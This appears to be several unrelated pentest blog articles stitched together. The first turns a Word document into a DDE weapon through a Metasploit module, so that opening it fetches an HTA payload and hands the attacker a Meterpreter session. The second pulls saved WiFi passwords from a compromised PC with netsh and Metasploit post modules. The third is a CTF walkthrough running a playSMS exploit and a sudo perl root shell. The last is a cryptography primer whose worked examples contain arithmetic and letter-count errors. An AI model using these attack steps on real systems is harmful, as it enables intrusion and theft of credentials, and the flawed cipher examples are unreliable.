Exploiting Windows Machine with DDE Exploit

DDE stands for “dynamic Data Exchange”, this is a method used by windows to facilitate one program being able to subscribe to an item made using another program. This exploit uses that functionality to exploit the victim endpoint. Once the victim clicks on the word file, a HTA payload is retrieved via HTTP and session is achieved.

Here is a step-by-step depiction of how it happens:

The code for the exploit has to be copied into Leafpad and saved with a “.rb” extension, you can name it anything you like, to avoid any confusion, ours is names “dde_delivery.rb”. This file has to now be moved into the windows section of the exploit folder in Metasploit, you can find the path and exploit URL below.

Exploit URL - https://raw.githubusercontent.com/realoriginal/metasploit-framework/fb3410c4f2e47a003fd9910ce78f0fc72e513674/modules/exploits/windows/script/dde_delivery.rb

Path of windows folder in Kali – usr > share > metasploit-framework > modules > exploits > windows

Here is what the exploit being pasted into the “windows” folder will look like.

Now open terminal and start Metasploit, once it starts, type “use exploit/windows/dde_delivery” and the exploit will load. Once that is done, all you need to do is set srvhost, this is the host IP. Once the exploit loads, type “set srvhost” followed by your IP, you can see what that would look like in the screenshot given below.

Press enter and you’re all set.

Type “exploit” and press Enter.

You will see a code generated, it has been highlighted in the screenshot given below. Copy this code.

NOTE: Do not close the terminal, it must remain active throughout.

Open Microsoft Word, navigate to the “Insert” tab, under the “Text” section you will find “Quick Parts”, click on it and in the drop menu you will see “Field…”

Click on “Field…”, another windows will appear, by default it will look like the screenshot pasted below, click OK

Once you click on OK, a text will appear “!Unexpected End of Formula”, select this text and right click on it, in the menu choose option “Toggle Field Codes”.

Once this is done, the text will change to “{  =\* MERGEFORMAT } “

Paste the code you copied from Metasploit within the “{ }”, as seen below.

Save the file in a “.docx” format, you can name it anything you like and close Microsoft Word.

You now have a handy word file that can be opened on a Windows 10 machine to achieve session.

Here is what it looks like when the word file is opened:

Once the word file is opened, you will see the following message, click “Yes”.

Next this message will appear. Again, click “Yes”

Finally this message will appear, click “OK”

Now go back to the terminal in kali for the good part.

You will see that the moment OK is clicked in the image above, Meterpreter will come online and you will have achieved session just like that!!

If in case you were wondering why at the beginning we made you manually copy the code into Leafpad and save it into Metasploit, it’s because this is a new exploit and has not been updated into the Metasploit database.

Have fun and stay ethical. 

Wifi Post Exploitation on Remote PC

Most of the Security protocols of Wi-Fi networks are often broken or bypassed exposing the wireless internet traffic to attackers. Through this article one can learn about different ways to get basic service sets information of remote user’s Wi-Fi as well as current network connection information, and how to extract saved Wireless LAN profiles of remote pc after that you will be disconnecting target user’s Wi-Fi too. All the following attacks are post exploitation attacks.

Table of Content

• Introduction
• Working of Wi-Fi
• Types of Wi-Fi security
• WLAN BSS List
• WLAN Current Connection
• WLAN Profile
• WLAN Disconnect
• Mimikatz
• Netsh

Introduction

All the wireless networking technology are commonly known as Wi-Fi. It provides high speed internet as it works on radio waves. Wi-Fi trademark is owned by the company the Wi-Fi Alliance; it officially defined as Wireless Local Area Network (WLAN). It is supported by many applications and devices such as mobile phones, PSAs, OS, Video game consoles, etc. therefore, it lets all the devices to communicate easily.

Working of Wi-Fi

As the name suggests, Wi-Fi network has no physical connection between sender and receiver. It uses radio frequency within the electromagnetic spectrum associated with radio waves. Therefore, it is able to provided high speed internet. Every Wi-Fi connection works through a Access Point (AP). The main job of an access point is to broadcast the signal that is further detected by electronic devices. ones the signal is detected they connect to the Wi-Fi in order to use Wi-Fi.

Types of Wi-Fi security

• Wired Equivalent Privacy
• Wi-Fi Protected Access
• Wi-Fi protected Access 2

Netsh

Now that you have session of the victim’s PC, go to the shell and use the following command to find out the wi-fi connections of victims’ PC over the time ;

netsh wlan show profiles

Get BSS information of a remote user’s Wi-Fi connection

This module gathers information about the wireless Basic Service Sets available to the victim machine.

e.g. this will give you SSID and other important  information regarding wireless connection.

msf > use post/windows/wlan/wlan_bss_list

msf post(wlan_bss_list) > set session 5

msf post(wlan_bss_list) > exploit

As the above image shows, till date the PC was connected to the Pentest Lab, Sinos, POCO PHONE, ignit. Now, we can use the following to gain the detailed information about the network :

netsh wlan show networks mode=bssid

Now, use the following command to see the password of a particular wi-fi :

netsh wlan show profile name=”ignit” key=clear

Get current Wi-Fi connection information of a remote user

This module gathers information about the current connection on each wireless lan interface on the target machine.

msf post(wlan_bss_list) > use post/windows/wlan/wlan_current_connection

msf post(wlan_current_connection) > set session 5

msf post(wlan_current_connection) > run

Get saved wireless LAN profile of a remote user

This module extracts saved Wireless LAN profiles. It will also try to decrypt the network key material. Behavior is slightly different between OS versions when it comes to WPA. In Windows Vista/7 we will get the passphrase. In Windows XP we will get the PBKDF2 derived key.

msf post(wlan_current_connection) > use post/windows/wlan/wlan_profile

msf post(wlan_profile) > set session 5

msf post(wlan_profile) > exploit

Disconnect a remote user’s Wi-Fi connection

This module disconnects the current wireless network connection on the specified interface.

msf > use post/windows/wlan/wlan_disconnect

msf post(wlan_disconnect) > set session 5

msf post(wlan_disconnect) > exploit

Other Way

I call it a post-exploitation toolkit because it has a lot of features, far beyond the ability to dump plain-text passwords.

meterpreter > load kiwi

meterpreter > help

this will give you entire wireless connection list with passwords as well.  VOILA! You got it right.

meterpreter > wifi_list

meterpreter > wifi_list_shared

Hack the dina VM (CTF Challenge)

Today we are going to take another CTF challenge Dina. The credit for making this VM machine goes to “Touhid Shaikh” and it is a boot2root challenge where we have to root the server and capture the flag to complete the challenge. You can download this VM here.

Security Level: Beginner

Penetrating Methodology:

1.      Scanning

·         Netdiscover

·         NMAP

2.      Enumeration

·         NMAP

·         Web Directory search 

3.      Exploitation

·         Metasploit

4.      Privilege Escalation

·         Exploiting Sudo rights

Walkthrough: 

Scanning:

Let’s start of by scanning the network and identifying host IP address. We can identify our host IP as 192.168.43.219 by using Netdiscover.

netdiscover

Then as usual we used our favorite tool Nmap for port enumeration. We found that port 80 is open.

nmap  –A 192.168.43.219

Enumeration:

As we can see port 80 is open, we tried to open the IP address in our browser but we didn’t find anything useful on the webpage.

Also in the nmap scan we found the robots.txt directory, so we tried to open it in the browser.

Inside the robots.txt directory we found the names of multiple directories, so we tried to open each one of them one by one but found /nothing directory useful to us.

The source code of /nothing directory revealed some passwords which were useful later.

We have got the passwords so we used dirb to find out any further directories where we could use these passwords. We found a directory named /secure.

dirb http://192.168.43.219

In the /secure directory there is a zip file named backup.zip. We download the file in our kali machine.

When we tried to extract the zip file it was password protected, so we tried all the passwords found above and freedom was the correct one.

Now after we extract the file we find an mp3 file. We checked the file type and found out it is actually an ASCII file. We opened it and got a username touhid and a name of directory /SecreTgatwayLogin.

file backup-cred.mp3

cat backup-cred.mp3

We opened the directory in the browser and got a playSMS login page. We put in the username touhid and tried the password from the above found list and diana worked for us.

Exploitation:

In the exploitation phase we looked for any exploit of playSMS web-application in the metasploit and found two exploits.

search playsms

We used the second exploit in which we are uploading our payload using a csv file.

We put in the required fields and used touhid and diana as username and password.

use exploit/multi/http/playsms_uploadcsv_exec

set rhost 192.168.43.219

set lhost 192.168.43.171

set lport 4444

set username touhid

set password Diana

set targeturi /SecreTgatwayLogin

exploit

After running the exploit, we successfully got a metrepreter session and the used python one liner to get a proper shell.

On checking the sudo permissions for the www-data user, it had a sudo permission to run perl.

getuid

shell

python -c 'import pty; pty.spawn("/bin/sh")'

sudo -l

Privilege Escalation:

To elevate to root privileges we exploited the sudo permissions of perl and successfully got the root shell. And then traversed to the root directory and found the flag.txt file.

sudo /usr/bin/perl –e “exec ‘/bin/sh’”

whoami

cd /root

ls

cat flag.txt

Beginner Guide to Classic Cryptography

Cryptography:  It is a technique of scrambling message using mathematical logic to keep the information secure. It preserve the scrambled message from being hacked when transport over unsecure network. Since it convert the readable message in unreadable text.

Plaintext: It is the content of data which is in readable form that need to share over insecure network.

Encrypting key: It is random string of bits created particularly to scramble the plaintext information into unreadable text using mathematical logic. There are two types of encryption key symmetric key and asymmetric key.

Cipher text: The output of encryption produce cipher text which in not readable by human beings.

Decrypting key: It is the key which use to decipher the cipher text into again plaintext using symmetric or asymmetric key to read original message

.

Functionality of cryptosystem

·         Authentication: It is the process of verification of the identity of the valid person through his username and password that communicates over a network.

·         Authorization: It refers to the process of granting or denying access to a network resource or service. Most of the computer security systems that we have today are based on a two-step mechanism. The first step is authentication, and the second step is authorization or access control, which allows the user to access various resources based on the user’s identity.

·         Confidentiality or privacy: It means the assurance that only authorized users can read or use confidential information. When cryptographic keys are used on plaintext to create cipher text, privacy is assigned to the information.

·         Integrity: Integrity is the security aspect that confirms that the original contents of information have not been altered or corrupted. There should be not any kind of modification with information while it transport over network.

·         Non repudiation: Non repudiation makes sure that each party is liable for its sent message. Someone can communicate and then later either falsely deny the communication entirely or claim that it occurred at a different time, or even deny receiving any piece of information.

Classical Cryptographic Algorithms types

Caesar cipher

Caesar cipher is a type of substitution cipher in which each letter of the alphabet is swap by a letter a certain distance away from that letter.

Algorithm

Step 0: Mathematically, map the letters to numbers (i.e., A = 1, B = 2, and so on).

Step 1: Select an integer key K in between 1 and 25 (i.e., there are total 26 letters in the English language) let say shift right 3 alphabets where A +3 = D, B+3 = E and so on.

Step 2: The encryption formula is “Add k mod 26”; that is, the original letter L becomes (L + k)%26.

For example encryption of “IGNITE” will like as:

C = E (L+K) %26

Here L= I and K = 3

C = E (I+3) % 26

C = E (9+3) % 26

C = E (12) % 26

C = E (L)

Hence encryption of IGNITE: LJQLWH

Step 3: The deciphering is “Subtract k mod 26”; that is, the encrypted letter L becomes (L – k) %26.

For example Decryption of “LJQLWH” will like as:

C = D (L-K) %26

C = D (L-3) % 26

C = D (12-3) % 26

C = D (9) % 26

C = D (I)

Hence decryption of LJQLWH: IGNITE

Limitation: Caesar cipher is vulnerable to brute-force attack because it depends on a single key with 25 possible values if the plaintext is written in English. Consequently, by trying each option and checking which one results in a meaningful word, it is possible to find out the key. Once the key is found, the full cipher text can be deciphered accurately.

Monoalphabetic Cipher

It is also a type of substitution cipher in which each letter of the alphabet is swap by using some permutation of the letters in alphabet. Hence permutations of 26 letters will be 26! (Factorial of 26) and that is equal to 4x10²⁶. This technique uses a random key for every single letter for encryption and which makes the monoalphabetic cipher secure against brute-force attack.

The sender and the receiver decide on a randomly selected permutation of the letters of the alphabet. For example in word “HACKING” replace G from “J” and N from “W” hence permutation key is 2! i.e. factorial of 2 and HACKING will become “HACKJIW”.

Algorithm

Step 0: Generate plaintext–cipher text pair by mapping each plaintext letter to a different random cipher text letter IJKLQR--------GFE.

Step 1: To encipher, for each letter in the original text, replace the plaintext letter with a cipher text letter.

Hence encryption of “IGNITE” will be as shown below:

Step 2: For deciphering, reverse the procedure in step 1.

Hence decryption of “USBUOQ” will be “IGNITE”

Limitations

Despite its advantages, the random key for each letter in monoalphabetic substitution has some downsides too. It is very difficult to remember the order of the letters in the key, and therefore, it takes a lot of time and effort to encipher or decipher the text manually. Monoalphabetic substitution is vulnerable to frequency analysis.

Playfair Cipher

It encrypts digraphs or pairs of letters rather than single letters like the plain substitution cipher

In this cipher a table of alphabet is 5x5 grids is created which contain 25 letters instead of 26. One alphabet “J” (or any other) is omitted. One would first fill in the spaces in the table with the letters of the keyword (dropping any duplicate letters), then fill the remaining spaces with the rest of the letters of the alphabet in order. If the plaintext () contains J, then it is replaced by I.

Algorithm

Step 0: Split the plaintext into pair, if number of letters are odd then add “X” with last letter of plaintext

For example “TABLE” is our plaintext split it into pair as: TA BL EX

Step 1: Set the 5 × 5 matrix by filling the first positions with the key. Fill the rest of the matrix with other letters. Let assume “ARTI” is our key for encryption.

Step 2: For encryption it involves three rules:

If both letters fall in the same row, substitute each with the letter to its right in a circular pattern. TA-----> IR

(1)    If both letters fall in the different row and column, form a rectangle with the two letters and take the letters on the horizontal opposite corner of the rectangle. BL-----> TN

(1)    If both letters fall in the same column, substitute each letter with the letter below it in a circular pattern. EX-----> LT

Hence encryption of word “TABLE” is “IR TN LT”.

Step 3: For decryption receiver use same key to decipher the text by reversing above three rules used in step 2.

Limitations:

Playfair is considerably complicated to break; it is still vulnerable to frequency analysis because in the case of Playfair, frequency analysis will be applied on the 25*25 = 625 possible digraphs rather than the 25 possible monographs (monoalphabetic)

Polyalphabetic Cipher

A polyalphabetic substitution cipher is a series of simple substitution ciphers. It is used to change each character of the plaintext with a variable length. The Vigenere cipher is a special example of the polyalphabetic cipher.

Algorithm

Step 0: Decide a encrypting key to change plaintext into cipher, for example take “HACKING” as encryption key whose numerical representation is “7, 0 ,2 ,10, 8, 13, 6 “

Step 1: To encrypt, the numeric number of first letter of the key encrypts the first letter of the plaintext, the second numeric number of second letter of the key encrypts the second letter of the plaintext, and so on.

For example plaintext is “VISIT TO HACKING ARTICLES” and key is “HACKING: 7 0 2 10 8 13 6”

Step 2: The encryption formula is “Add k mod 26”; that is, the original letter L becomes (L + k)%26

C = E (L+K) %26

Here L=V and K =7

C = E (V+7) %26

C = E (21+7) %26

C = E (28) %26

C = E (2)

C = E (C)

Hence encryption of “VISIT TO HACKING ARTICLES” is “CIUSBGUOAEUQAMHRVSKYKZ”

Step 3: The deciphering is “Subtract k mod 26”; that is, the encrypted letter L becomes (L – k) %26.

For example Decryption of “CIUSBGUOAEUQAMHRVSKYKZ” will like as:

C = D (L-K) %26

Here L=C and K =7

C = E (C-7) %26

C = E (21)

C = E (V)

Hence decryption of “CIUSBGUOAEUQAMHRVSKYKZ” is “VISIT TO HACKING ARTICLES”

Limitation

The main limitation of the Vigenère cipher is the repeating character of its key. If a cryptanalyst properly estimate the length of the key, then the cipher text can be treated as link Caesar ciphers, which can be easily broken separately.

Rotation cipher

In rotation cipher generates cipher text on the behalf of block size and angle of rotation of plain text in the direction of following angles: 90^o 180⁰ 270^o 

Algorithm

Step 0: Decide the size of block for plaintext “CRYPTOGRAPHY”, let assume 6 as block size for it.

CRYPTO

GRAPHY

Step 1: For encryption arrange plaintext in any direction among these angles 90^o 180⁰ 270^o   as shown below:

·         In 90^o Rotation place starting letter downwards vertically from G to C and so on.

CRYPTO

GRAPHY

·         In 180^o Rotation place letter right to left horizontally from O to C and so on.

CRYPTO	OTPYRC
GRAPHY	YHPARG

·         In 270^o Rotation place last letter top to bottom vertically from O to Y and so on.

CRYPTO

GRAPHY

Hence cipher text will arrange in following ways:

Step 2: arrange letter according their angles represents:

90^o   rotated cipher “GCRRAYPPHTYO”

180^o   rotated cipher “YHPARGOTPYRC”

270^o   rotated cipher “OYTHPPYARRCG”

Step 3: for decryption using block size and angle of rotation among all above three cipher texts can be decrypt.

Transposition cipher

In transposition cipher plaintext are rearrange without replacing original letter from other as compare to above cipher techniques.

Algorithm

Step 0: Decide the keyword that will be represent the number of column of a table which store plain text inside it, and help in generating cipher text, let suppose we choose CIPHER as key.

Step 1: store plaintext “classical cryptography” in a table from left to right cell.

Step 2: for encryption arrange all letters according to columns from in ascending order of keyword “CIPHER” will be CEHIPR as:

Column 1: CCCPP

Column2: ESRR

Column 3: HSCG

Column 4: PALOY

Column 5: RIYA

Hence the cipher obtain will be “CCCPPESRRHSCGPALOYRIYA”

Step 3: for decryption receiver use key to rearrange 26 cipher letters according to its column in 6*5 matrix.

Limitation

It was very easy to rearrange cipher letter if correct key is guesses.

Rail fence cipher

The 'rail fence cipher' also called a zigzag cipher is a form of transposition cipher the plain text is written downwards and diagonally on successive "rails" of an imaginary fence, then moving up when we reach the bottom rail. 

Algorithm

Step 0: choose the number rails which will act as key for plotting the plaintext on it. Here 3 rails is decided as key for encryption

Step 1: plot plaintext “RAJ CHANDEL” on the rail in zigzag form, in direction top to bottom (downwards and diagonally) and then bottom to up (upwards and diagonally)

Step 2: for encryption place all letter horizontally starting form row 1 to row 3 as:

Row 1: RHE

Row 2: ACADL

Row 3: JN

Hence encryption for “RAJCHANDEL” is “RHEACADLJN”

Step 3: for decryption generate the matrix by multiplying total cipher text with number of rail, here

Total 10 letters are in cipher text “RHEACADELJN” and 3 rails, hence matrix will of 10*3.

 Transverse the above rule use in encryption and place the cipher text as

Row 1: RHE

Row 2: ACADL

Row 3: JN

Limitations

The rail fence cipher is not very strong; the number of practical keys (the number of rails) is small enough that a cryptanalyst can try them all by hand.